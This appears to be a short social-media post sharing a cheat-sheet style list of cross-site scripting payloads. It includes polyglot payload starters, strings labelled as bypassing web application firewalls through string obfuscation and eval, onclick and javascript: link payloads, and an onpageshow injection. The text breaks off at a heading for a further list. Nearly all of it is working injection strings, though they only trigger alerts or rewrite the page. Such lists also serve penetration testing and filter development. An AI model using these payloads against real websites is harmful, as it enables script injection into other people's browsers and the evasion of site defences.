JuanDeLemos: Some XSS payload starts <!'/*!"/*!//'/*//"/*--!> or >');'>%>?>">">\x22\x3e/*-->]]> <!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg> Fuck WAF <script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/"> Fuck WAF with string obfuscation <script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/"> XSS in href link <a href="" onclick=``/name==alert(1)>clickme1</a> or <a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a> Rewrite page <a href="javascript:document.write('c========3'); void(0);">Middle-click me</a> New test '\"--!><Body /Onpageshow=confirm`1`> "-->'><script>alert(1);</script>" List of different XSS Cheat